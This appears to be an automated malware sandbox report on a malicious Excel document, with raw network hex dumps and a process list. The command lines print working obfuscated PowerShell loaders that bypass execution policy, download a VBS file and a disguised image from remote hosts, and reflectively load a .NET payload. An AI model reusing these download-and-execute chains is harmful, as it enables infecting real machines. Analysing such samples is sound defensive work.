                                                                                                                    2024-12-11 09:54:37 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                                                                    Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                                                                    2024-12-11 09:54:37 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                                                                    Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                                                                    2024-12-11 09:54:37 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                                                                    Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                                                                    2024-12-11 09:54:37 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                                                                    Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                                                                                    2024-12-11 09:54:37 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                                                                    Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                                                                    2024-12-11 09:54:37 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                                                                    Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                                                                    2024-12-11 09:54:37 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                                                                    Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                                                                    2024-12-11 09:54:37 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                                                    Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                                                                                    Click to jump to process

                                                                                                                    Click to jump to process

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Click to jump to process

                                                                                                                    Target ID:0
                                                                                                                    Start time:04:53:28
                                                                                                                    Start date:11/12/2024
                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                    Imagebase:0x13f510000
                                                                                                                    File size:28'253'536 bytes
                                                                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:4
                                                                                                                    Start time:04:53:54
                                                                                                                    Start date:11/12/2024
                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                    Imagebase:0x13fb60000
                                                                                                                    File size:13'824 bytes
                                                                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:6
                                                                                                                    Start time:04:53:59
                                                                                                                    Start date:11/12/2024
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
                                                                                                                    Imagebase:0x4a6b0000
                                                                                                                    File size:345'088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:8
                                                                                                                    Start time:04:53:59
                                                                                                                    Start date:11/12/2024
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
                                                                                                                    Imagebase:0x13f0e0000
                                                                                                                    File size:443'392 bytes
                                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:9
                                                                                                                    Start time:04:54:00
                                                                                                                    Start date:11/12/2024
                                                                                                                    Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
                                                                                                                    Imagebase:0x1120000
                                                                                                                    File size:2'525'680 bytes
                                                                                                                    MD5 hash:2F8D93826B8CBF9290BC57535C7A6817
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:11
                                                                                                                    Start time:04:54:03
                                                                                                                    Start date:11/12/2024
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline"
                                                                                                                    Imagebase:0x13f4d0000
                                                                                                                    File size:2'758'280 bytes
                                                                                                                    MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:12
                                                                                                                    Start time:04:54:03
                                                                                                                    Start date:11/12/2024
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD3B4.tmp" "c:\Users\user\AppData\Local\Temp\oojbmfem\CSCF5327E7FE341DA9559637718172BC.TMP"
                                                                                                                    Imagebase:0x13f830000
                                                                                                                    File size:52'744 bytes
                                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:14
                                                                                                                    Start time:04:54:09
                                                                                                                    Start date:11/12/2024
                                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS"
                                                                                                                    Imagebase:0xffd80000
                                                                                                                    File size:168'960 bytes
                                                                                                                    MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:15
                                                                                                                    Start time:04:54:14
                                                                                                                    Start date:11/12/2024
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
                                                                                                                    Imagebase:0x13f510000
                                                                                                                    File size:443'392 bytes
                                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Target ID:17
                                                                                                                    Start time:04:54:16
                                                                                                                    Start date:11/12/2024
                                                                                                                    Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                                                                                    Imagebase:0x2a0000
                                                                                                                    File size:9'805'808 bytes
                                                                                                                    MD5 hash:326A645391A97C760B60C558A35BB068
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:18
                                                                                                                    Start time:04:54:16
                                                                                                                    Start date:11/12/2024
                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                    Wow64 process (32bit):false
